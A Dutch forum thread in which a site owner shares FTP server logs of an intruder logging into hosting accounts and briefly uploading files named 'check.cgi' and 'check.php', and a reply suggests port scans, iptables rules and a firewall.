Wed Nov  5 19:12:26 2008 [pid 2314] CONNECT: Client "91.203.93.49"
Wed Nov  5 19:12:26 2008 [pid 2313] [account_a] OK LOGIN: Client "91.203.93.49"
Wed Nov  5 19:15:01 2008 [pid 2389] CONNECT: Client "91.203.93.49"
Wed Nov  5 19:15:01 2008 [pid 2391] CONNECT: Client "91.203.93.49"
Wed Nov  5 19:15:01 2008 [pid 2390] [account_b] OK LOGIN: Client "91.203.93.49"
Wed Nov  5 19:15:03 2008 [pid 2388] [account_c] FAIL LOGIN: Client "91.203.93.49"
Wed Nov  5 19:15:11 2008 [pid 2392] [account_b] OK UPLOAD: Client "91.203.93.49", "/public_html/check.cgi", 1188 bytes, 3.95Kbyte/sec
Wed Nov  5 19:15:11 2008 [pid 2392] [account_b] OK CHMOD: Client "91.203.93.49", "/public_html/check.cgi 0755"
Wed Nov  5 19:15:11 2008 [pid 2392] [account_b] OK UPLOAD: Client "91.203.93.49", "/public_html/check.php", 36 bytes, 0.13Kbyte/sec
Wed Nov  5 19:15:11 2008 [pid 2402] CONNECT: Client "91.203.93.49"
Wed Nov  5 19:15:12 2008 [pid 2401] [account_a] OK LOGIN: Client "91.203.93.49"
Wed Nov  5 19:15:12 2008 [pid 2392] [account_b] OK DELETE: Client "91.203.93.49", "/public_html/check.cgi"
Wed Nov  5 19:15:13 2008 [pid 2392] [account_b] OK DELETE: Client "91.203.93.49", "/public_html/check.php"
Wed Nov  5 19:15:20 2008 [pid 2403] [account_a] OK UPLOAD: Client "91.203.93.49", "/public_html/check.cgi", 1188 bytes, 4.14Kbyte/sec
Wed Nov  5 19:15:21 2008 [pid 2403] [account_a] OK CHMOD: Client "91.203.93.49", "/public_html/check.cgi 0755"
Wed Nov  5 19:15:21 2008 [pid 2403] [account_a] OK UPLOAD: Client "91.203.93.49", "/public_html/check.php", 36 bytes, 0.13Kbyte/sec
Wed Nov  5 19:15:22 2008 [pid 2403] [account_a] OK DELETE: Client "91.203.93.49", "/public_html/check.cgi"
Wed Nov  5 19:15:22 2008 [pid 2403] [account_a] OK DELETE: Client "91.203.93.49", "/public_html/check.php"
Wed Nov  5 19:37:03 2008 [pid 3219] CONNECT: Client "91.203.93.49"
Wed Nov  5 19:37:05 2008 [pid 3218] [account_c] FAIL LOGIN: Client "91.203.93.49"
Wed Nov  5 19:37:06 2008 [pid 3223] CONNECT: Client "91.203.93.49"
Wed Nov  5 19:37:06 2008 [pid 3222] [account_b] OK LOGIN: Client "91.203.93.49"
Wed Nov  5 19:37:13 2008 [pid 3239] CONNECT: Client "91.203.93.49"
Wed Nov  5 19:37:13 2008 [pid 3238] [account_a] OK LOGIN: Client "91.203.93.49"
Wed Nov  5 20:54:08 2008 [pid 5973] CONNECT: Client "91.203.93.49"
Wed Nov  5 20:54:08 2008 [pid 5975] CONNECT: Client "91.203.93.49"
Wed Nov  5 20:54:08 2008 [pid 5972] [account_b] OK LOGIN: Client "91.203.93.49"
Wed Nov  5 20:54:10 2008 [pid 5974] [account_c] FAIL LOGIN: Client "91.203.93.49"
Wed Nov  5 20:54:17 2008 [pid 5976] [account_b] OK UPLOAD: Client "91.203.93.49", "/public_html/check.cgi", 1188 bytes, 4.21Kbyte/sec
Wed Nov  5 20:54:17 2008 [pid 5976] [account_b] OK CHMOD: Client "91.203.93.49", "/public_html/check.cgi 0755"
Wed Nov  5 20:54:17 2008 [pid 5976] [account_b] OK UPLOAD: Client "91.203.93.49", "/public_html/check.php", 36 bytes, 0.13Kbyte/sec
Wed Nov  5 20:54:18 2008 [pid 5979] CONNECT: Client "91.203.93.49"
Wed Nov  5 20:54:18 2008 [pid 5978] [account_a] OK LOGIN: Client "91.203.93.49"
Wed Nov  5 20:54:18 2008 [pid 5976] [account_b] OK DELETE: Client "91.203.93.49", "/public_html/check.cgi"
Wed Nov  5 20:54:18 2008 [pid 5976] [account_b] OK DELETE: Client "91.203.93.49", "/public_html/check.php"
Wed Nov  5 20:54:26 2008 [pid 5980] [account_a] OK UPLOAD: Client "91.203.93.49", "/public_html/check.cgi", 1188 bytes, 4.27Kbyte/sec
Wed Nov  5 20:54:26 2008 [pid 5980] [account_a] OK CHMOD: Client "91.203.93.49", "/public_html/check.cgi 0755"
Wed Nov  5 20:54:27 2008 [pid 5980] [account_a] OK UPLOAD: Client "91.203.93.49", "/public_html/check.php", 36 bytes, 0.14Kbyte/sec
Wed Nov  5 20:54:28 2008 [pid 5980] [account_a] OK DELETE: Client "91.203.93.49", "/public_html/check.cgi"
Wed Nov  5 20:54:28 2008 [pid 5980] [account_a] OK DELETE: Client "91.203.93.49", "/public_html/check.php"

En ja, het duurde een beetje lang voordat we het doorhadden, maarja, het was ook geen actief bezochtte site.

[ Voor 92% gewijzigd door trinite_t op 18-12-2008 14:04 ]

The easiest way to solve a problem is just to solve it.

donderdag 18 december 2008 13:55

Acties:

soulrider

al een portmap gemaakt (of een sniffer hebben draaien?)
mogelijk heb je iets meer openstaan dan ftp, http, mail en dergelijken

alsook het dichtzwieren van poorten mbv iptables ofzo kan helpen.

heb je er enkel de site, of is het een server - virtual of dedicated? en kan je hoster bv geen firewall aanbieden?
(of is de server compromised ipv enkel de website-code?)